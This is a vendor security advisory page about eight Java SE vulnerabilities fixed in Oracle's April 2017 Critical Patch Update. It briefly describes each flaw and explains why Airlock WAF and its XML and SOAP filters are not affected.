You are here
Oracle CPU April 2017 - Java (WAF)
Submitted on 21. April 2017 - 11:24 by rischi.
Last update on 21. April 2017 - 16:21.
Last update on 21. April 2017 - 16:21.
IDs:
CVE-2017-3511, CVE-2017-3526, CVE-2017-3533, CVE-2017-3544, CVE-2017-3512, CVE-2017-3514, CVE-2017-3509, CVE-2017-3539
Keywords:
java, cpu, Oracle Critical Patch Update
Description:
The Oracle Critical Patch Update for April 2017 includes updates for Java SE [1] which fix 8 vulnerabilities.
- CVE-2017-3533
This can lead to XML external entity attacks (XXE), allowing remote users, e.g., to execute SMTP or FTP commands on the machine being attacked, or to open firewall ports.
Airlock WAF is not affected because all XML input is trusted. The Airlock SOAP and XML filter are not affected by default since DTDs are not allowed. - CVE-2017-3544
This allows manipulations of SMTP connections by inserting newline characters into sender or recipient addresses when sending mails. Airlock WAF is not affected because the affected Java SMTP client is not used. - CVE-2017-3511
This vulnerability concerns the JCE (Java Cryptography Extension) component and may allow a local attacker to escalate his privileges. Airlock WAF is not vulnerable, as local administrators are trusted. - CVE-2017-3526
This issue in the JAXP component may allow denial of service attacks when parsing XML files. Airlock WAF is not affected because all XML input is trusted. The Airlock SOAP and XML filter are not affected, because Airlock WAF enforces size limits on XML documents. - CVE-2017-3512, CVE-2017-3514, CVE-2017-3509, CVE-2017-3539
Only affect client deployments that run untrusted code. Airlock WAF is not affected.
Resolution:
No action required for Airlock WAF, Airlock XML filter and Airlock SOAP filter.
General Advice: We strongly recommend to update all client deployments of Java and uninstalling Java from clients where it is not needed.
Airlock Vulnerability Status:
Does not affect Airlock
Back-end Vulnerability Status:
No action required